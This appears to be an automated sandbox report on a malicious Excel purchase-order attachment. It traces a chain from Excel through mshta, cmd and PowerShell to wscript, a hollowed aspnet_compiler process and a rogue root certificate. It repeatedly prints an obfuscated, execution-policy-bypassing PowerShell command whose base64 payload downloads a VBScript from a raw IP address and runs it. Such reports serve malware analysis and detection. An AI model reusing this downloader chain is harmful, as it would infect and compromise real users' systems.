              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
              Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
              Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
              Source: Binary string: .pdb>Uxx source: powershell.exe, 00000013.00000002.490184350.000000001AB44000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdb source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000001B.00000002.509949677.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdbhP source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.pdbhP source: powershell.exe, 00000008.00000002.448366945.00000000024F4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.pdb source: powershell.exe, 00000013.00000002.485237811.0000000002593000.00000004.00000800.00020000.00000000.sdmp
              Source: PO#BBGR2411PO69.xlsInitial sample: OLE indicators encrypted = True

              Data Obfuscation

              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'JE95Q1A0TjJ6RklBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJlUkRFRkluSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeWpCR1Usc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERFcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuVEd5VHNBbUdpayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtBRkspOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiaFdyZHhtVWFXZyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFJ3VUdyUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJE95Q1A0TjJ6RklBOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ2LjcwLjExMy4yMDAvMjMxL3NlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmb3J1LnRJRiIsIiRFTlY6QVBQREFUQVxzZWV0aGViZXN0bWFnaWNhbHRoaWduc2dpdmVnb29kZm8udmJTIiwwLDApO3N0QXJULXNsRWVwKDMpO0lpICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZXRoZWJlc3RtYWdpY2FsdGhpZ25zZ2l2ZWdvb2Rmby52YlMi'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D51F8 push ds; ret 8_2_000007FE899D5242
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D022D push eax; iretd 8_2_000007FE899D0241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D00BD pushad ; iretd 8_2_000007FE899D00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D5813 push ebx; ret 8_2_000007FE899D583A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D580D push ecx; ret 8_2_000007FE899D5812
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899D583B push esp; ret 8_2_000007FE899D585A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE89AA096D pushad ; ret 8_2_000007FE89AA0991
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041E922 push es; retf 27_2_0041E926
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004032D0 push eax; ret 27_2_004032D2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00401BD8 pushad ; ret 27_2_00401BDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_004163F3 push edi; retf 27_2_004164AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416390 push cs; iretd 27_2_004163C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416393 push cs; iretd 27_2_004163C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00404C4C push ebx; retf 27_2_00404CDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416453 push edi; retf 27_2_004164AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00404C65 push ebx; retf 27_2_00404CDD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00416438 push edi; retf 27_2_004164AE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00423594 pushfd ; retf 27_2_00423595
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00414616 push ebp; ret 27_2_00414631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00414623 push ebp; ret 27_2_00414631
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00418E31 push FFFFFFF1h; ret 27_2_00418E3C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041E6A0 pushfd ; ret 27_2_0041E6C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041EF45 push edi; retf 27_2_0041EF5F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0041EF53 push edi; retf 27_2_0041EF5F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_0040CFAF push esp; retf 27_2_0040CFB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 27_2_00A7DFA1 push ecx; ret 27_2_00A7DFB4

              Persistence and Installation Behavior

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dll
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
